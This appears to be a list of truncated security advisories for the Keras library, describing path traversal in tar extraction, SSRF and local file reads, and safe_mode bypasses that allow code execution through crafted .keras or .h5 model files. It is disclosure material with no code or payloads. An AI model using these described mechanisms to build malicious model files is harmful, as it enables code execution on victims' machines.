The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the …
The Keras.Model.load_model method, including when executed with the intended security mitigation safe_mode=True, is vulnerable to arbitrary local file loading and Server-Side Request Forgery (SSRF). This vulnerability stems from the way the StringLookup layer is handled during model loading from a specially crafted .keras archive. The constructor for the StringLookup layer accepts a vocabulary argument that can specify a local file path or a remote file path. Arbitrary Local File Read: …
Deserialization of untrusted data can occur in versions of the Keras framework running versions 3.11.0 up to but not including 3.11.3, enabling a maliciously uploaded Keras file containing a TorchModuleWrapper class to run arbitrary code on an end user’s system when loaded despite safe mode being enabled. The vulnerability can be triggered through both local and remote files.
When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not …
Arbitrary Code Execution in Keras Keras versions prior to 3.11.0 allow for arbitrary code execution when loading a crafted .keras model archive, even when safe_mode=True. The issue arises because the archive’s config.json is parsed before layer deserialization. This can invoke keras.config.enable_unsafe_deserialization(), effectively disabling safe mode from within the loading process itself. An attacker can place this call first in the archive and then include a Lambda layer whose function is …
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references. Original Description The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special .h5 archive file …
It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules. The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-c9rc-mg46-23w3. This link is maintained to preserve external references. Original Description A safe mode bypass vulnerability in the Model.load_model method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted .keras model archive.
The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading.
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-48g7-3x6r-xfhp. This link is maintained to preserve external references. Original Description The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model …
An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function.